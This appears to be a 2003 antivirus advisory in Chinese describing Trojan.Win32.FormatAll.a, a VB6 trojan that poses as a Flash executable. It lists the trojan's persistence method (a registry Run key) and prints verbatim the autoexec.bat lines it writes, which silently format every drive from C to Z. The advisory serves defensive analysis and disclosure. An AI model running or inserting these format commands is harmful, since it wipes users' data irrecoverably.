概述
病毒別名:Trojan.Win32.FormatAll.a 【AVP】處理時間:2003-11-10
威脅級別:★
中文名稱:
病毒類型:木馬
影響系統:Win9x/WinNT/Win2K/WinXP/Windows Server 2003
病毒行為:
編寫工具:
Visual Basic 6.0
傳染條件:
檔案圖示為 flash 執行檔圖示,藉此引誘用戶執行。
發作條件:
系統修改:
A、將自己拷貝到 %System%flash.exeB、在系統根目錄下生成 autoexec.bat 檔案,其中內容如下:
@echo off
@echo y|format c:/v:lb/q
@cls
@echo y|format d:/v:LB/q
@cls
@echo y|format e:/v:LB/q
@cls
………………
@echo y|format z:/v:LB/q
@cls
C、在註冊表的主鍵:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
中添加如下鍵值:
"flash" = "%System%flash.exe"
發作現象:
運行後立即重啟,當系統再次啟動時執行 autoexec.bat,格式化所有分區,並且格式化前不需要按鍵確認,導致無法進入系統。如果 autoexec.bat 由於某些原因沒有被正常執行,將進入 windows,然後會再次執行被拷貝到 %system% 目錄下的 flash.exe 檔案,導致系統再次重啟。
特別說明:
